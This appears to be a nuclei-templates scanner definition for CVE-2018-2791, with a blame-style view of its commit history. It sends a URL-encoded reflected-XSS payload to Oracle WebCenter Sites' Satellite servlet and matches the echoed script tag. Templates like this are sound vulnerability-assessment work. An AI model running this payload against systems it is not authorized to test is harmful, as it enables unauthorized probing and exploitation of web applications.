nuclei-templates/cves/CVE-2018-2791.yaml

id: CVE-2018-2791

info:
  name: Oracle WebCenter Sites XSS
  author: madrobot
  severity: medium

requests:
  - method: GET
    path:
      - "{{BaseURL}}/servlet/Satellite?c=Noticia&cid={ID}&pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=eee%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C"
    matchers:
      - type: word
        words:
          - "<script>alert(1337)</script>"
        part: body
Create Oracle WebCenter Sites XSS.yaml 2020-04-08 11:37:09 +00:00			`id: CVE-2018-2791`

			`info:`
			`name: Oracle WebCenter Sites XSS`
Update Oracle WebCenter Sites XSS.yaml 2020-04-08 11:43:51 +00:00			`author: madrobot`
			`severity: medium`
Create Oracle WebCenter Sites XSS.yaml 2020-04-08 11:37:09 +00:00
			`requests:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/servlet/Satellite?c=Noticia&cid={ID}&pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=eee%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C"`
			`matchers:`
			`- type: word`
			`words:`
Update and rename Oracle WebCenter Sites XSS.yaml to CVE-2018-2791.yaml 2020-04-08 16:14:09 +00:00			`- "<script>alert(1337)</script>"`
Create Oracle WebCenter Sites XSS.yaml 2020-04-08 11:37:09 +00:00			`part: body`